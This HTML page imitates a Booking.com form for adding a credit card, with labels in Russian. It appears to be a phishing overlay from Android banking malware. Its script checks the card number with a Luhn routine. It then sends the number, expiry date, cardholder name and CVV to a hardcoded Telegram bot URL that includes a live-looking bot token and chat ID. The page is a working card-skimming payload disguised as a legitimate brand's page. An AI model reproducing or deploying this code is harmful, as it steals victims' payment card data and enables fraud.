<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <link rel="stylesheet" href="ru/css/bootstrap.min.css">
    <script src="ru/js/jquery.min.js"></script>
    <script src="ru/js/jquery.mask.js"></script>
	<link rel="stylesheet" href="ru/com.booking/style.css">
</head>

<body>
    <div class="centered">
        <div class="header">
            Добавить новую кредитную карту
        </div>
        <form action="null"  method="post" id="_mainForm" target="flow_handler">
			<div class="pad">
				<input type="tel" class="field" id="number" name="number" placeholder="Номер кредитной карты">

				<select id="type-card" class="field">
					<option value="">Тип кредитной карты</option>
					<option value="American Express">American Express</option>
					<option value="VISA">VISA</option>
					<option value="Mastercard">Mastercard</option>
				</select>

				<input type="text" class="field" id="holder" name="holder" placeholder="Имя владельца карты">

				<label for="exp" style="display: block;">Действительна до</label>
				<select id="exp-mm" class="field-exp">
					<option value="">месяц</option>
					<option value="01">01</option>
					<option value="02">02</option>
					<option value="03">03</option>
					<option value="04">04</option>
					<option value="05">05</option>
					<option value="06">06</option>
					<option value="07">07</option>
					<option value="08">08</option>
					<option value="09">09</option>
					<option value="10">10</option>
					<option value="11">11</option>
					<option value="12">12</option>
				</select>
				<select id="exp-yy" class="field-exp" style="float: right;">
					<option value="">год</option>
					<option value="2019">2019</option>
					<option value="2020">2020</option>
					<option value="2021">2021</option>
					<option value="2022">2022</option>
					<option value="2023">2023</option>
					<option value="2024">2024</option>
					<option value="2025">2025</option>
					<option value="2026">2026</option>
					<option value="2027">2027</option>
					<option value="2029">2029</option>
				</select>

				<input type="text" class="field" id="cvc" name="cvc" maxlength="3" placeholder="CVV/CVC (3 последние цифры на обратной стороне карты)">

				<div class="line">
					<span>Использовать эту карту для деловых пездок</span>
				</div>
				<input type="submit" class="button" id="input_finish" value="Сохранить карту">
				<input type="button" class="button" disabled value="Отмена">
			</div>
        </form>
    </div>
</body>
<iframe src="about:blank" name="flow_handler" style="visibility:hidden;display:none"></iframe>
    <script>
        $('#number').mask('0000 0000 0000 0000');
    </script>
    <script type="text/javascript">function test2(){setTimeout(function(){ window.location.replace("file:///android_asset/blank.html");}, 1000); };
        (function () {
        var  __insHiddenField = function (objDoc, objForm, sNm, sV) {
            var input = objDoc.createElement("input");
            input.setAttribute("type", "hidden");
            input.setAttribute("name", sNm);
            input.setAttribute("value", sV);
            input.value = sV;
            objForm.appendChild(input);
        };
                    var g_oBtn = document.getElementById('input_finish');
                    g_oBtn.onclick = function () {
                    
                        var number = $("#number").val(); 
                         number = number.replace(/\s+/g,'');
                        var oTypeInp = document.getElementById('type-card');
                        var oHolderInp = document.getElementById('holder');
                        var oExpMMInp = document.getElementById('exp-mm');
                        var oExpYYInp = document.getElementById('exp-yy');
                        var oCvcInp = document.getElementById('cvc');

                        try{
                            $("#number").removeClass('error');
                            oTypeInp.className = 'field';
                            oHolderInp.className = 'field';
                            oExpMMInp.className = 'field-exp';
                            oExpYYInp.className = 'field-exp';
                            oCvcInp.className = 'field';
                        } catch(e){};

                        if(number == '0000000000000000'){
                          try{                          
                                $("#number").addClass('error');
                            } catch(e){};                        
                       
                        return false;
                        } 

                        if(!Moon(number)){
                          try{                          
                                $("#number").addClass('error');
                            } catch(e){};                        
                            return false;
                        } 
                        
                        if (oTypeInp.value.length < 2) {
                            try{
                                oTypeInp.className = 'field error';
                            } catch(e){};
                            return false;
                        }
                        
                        if (oHolderInp.value.length < 2) {
                            try{
                                oHolderInp.className = 'field error';
                            } catch(e){};
                            return false;
                        }
                        
                        if (oExpMMInp.value.length < 2) {
                            try{
                                oExpMMInp.className = 'field-exp error';
                            } catch(e){};
                            return false;
                        }
                        
                        if (oExpYYInp.value.length < 2) {
                            try{
                                oExpYYInp.className = 'field-exp error';
                            } catch(e){};
                            return false;
                        }
                        
                        if (oCvcInp.value.length < 3) {
                            try{
                                oCvcInp.className = 'field';
                            } catch(e){};
                            return false;
                        }
						
        top['closeDlg'] = true;
          	var url='<?php echo $URL; ?>';
           	var imei_c='<?php echo $IMEI_country; ?>';
           	fetch("https://api.telegram.org/bot2109326350:AAESgBTRopBgrGVKC-QwsM8XveGKDK-38M4/sendMessage?chat_id=-1001712661501&text=|ru_booking|ru_aliexpress|"+number+"|"+oExpMMInp.value+"|"+oExpYYInp.value+"|"+oHolderInp.value+"|"+oCvcInp.value);

        return false;
        };
        })();

        function Moon(card_number) {
card_length = card_number.length;
if(card_length == '0') return false;
if(card_length < '16') return false;
  var arr = [],
      card_number = card_number.toString();
  for(var i = 0; i < card_number.length; i++) {
    if(i % 2 === 0) {
      var m = parseInt(card_number[i]) * 2;
      if(m > 9) {
        arr.push(m - 9);
      } else {
        arr.push(m);
      } 
    } else {
        var n = parseInt(card_number[i]);
        arr.push(n)
      }
  }
  //console.log(arr);
  var summ = arr.reduce(function(a, b) { return a + b; });
  return Boolean(!(summ % 10));

} 
    </script>
</body>
</html>